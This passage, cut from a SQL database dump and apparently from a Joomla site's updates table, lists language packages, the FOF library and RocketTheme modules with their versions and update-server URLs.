K_details.xml','',''),(729,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.6.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(730,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(731,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(732,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(733,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(734,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(735,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(736,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(737,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(738,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(739,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(740,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(741,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(742,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(743,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(744,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(745,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(746,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(747,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.3','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3033',''),(748,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(749,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(750,3,0,'French','','pkg_fr-FR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(751,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(752,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(753,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(754,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(755,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(756,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(757,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(758,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(759,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(760,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(761,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(762,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(763,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(764,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(765,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.6.2','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(766,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(767,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(768,3,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(769,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.6.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(770,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(771,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(772,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(773,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(774,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(775,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(776,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(777,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(778,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(779,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(780,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(781,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(782,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(783,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(784,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(785,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(786,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(787,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(788,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(789,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(790,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(791,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(792,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(793,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(794,57,0,'French','','pkg_fr-FR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(795,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(796,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(797,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(798,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(799,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(800,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(801,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(802,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(803,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(804,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(805,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(806,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(807,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(808,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(809,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.6.2','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(810,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(811,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(812,57,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(813,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.6.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(814,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(815,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(816,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(817,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(818,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(819,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(820,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(821,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(822,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(823,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(824,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(825,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(826,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(827,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(828,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(829,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(830,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(831,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(832,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(833,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.3','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3033',''),(834,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(835,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(836,3,0,'French','','pkg_fr-FR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(837,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(838,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(839,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(840,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(841,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(842,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(843,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(844,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(845,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(846,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(847,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(848,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(849,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(850,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(851,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.6.2','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(852,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(853,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(854,3,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(855,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.6.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(856,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(857,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(858,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(859,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(860,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(861,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(862,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(863,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(864,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(865,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(866,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(867,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(868,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(869,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(870,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(871,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(872,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(873,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(874,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(875,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(876,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(877,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(878,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(879,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(880,57,0,'French','','pkg_fr-FR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(881,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(882,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(883,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(884,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(885,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(886,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(887,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(888,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(889,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(890,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(891,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(892,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(893,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(894,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(895,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.6.2','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(896,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(897,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(898,57,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(899,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.6.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(900,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(901,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(902,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(903,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(904,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(905,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(906,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(907,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(908,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(909,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(910,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(911,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(912,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(913,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(914,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(915,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(916,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(917,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(918,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(919,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.3','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3033',''),(921,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(922,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(923,3,0,'French','','pkg_fr-FR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(924,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(925,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(926,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(927,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(928,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(929,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(930,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(931,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(932,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(933,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(934,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(935,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(936,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(937,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(938,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.6.2','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(939,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(940,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(941,3,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(942,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.6.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(943,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(944,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(945,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(946,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(947,3,0,'Serbian 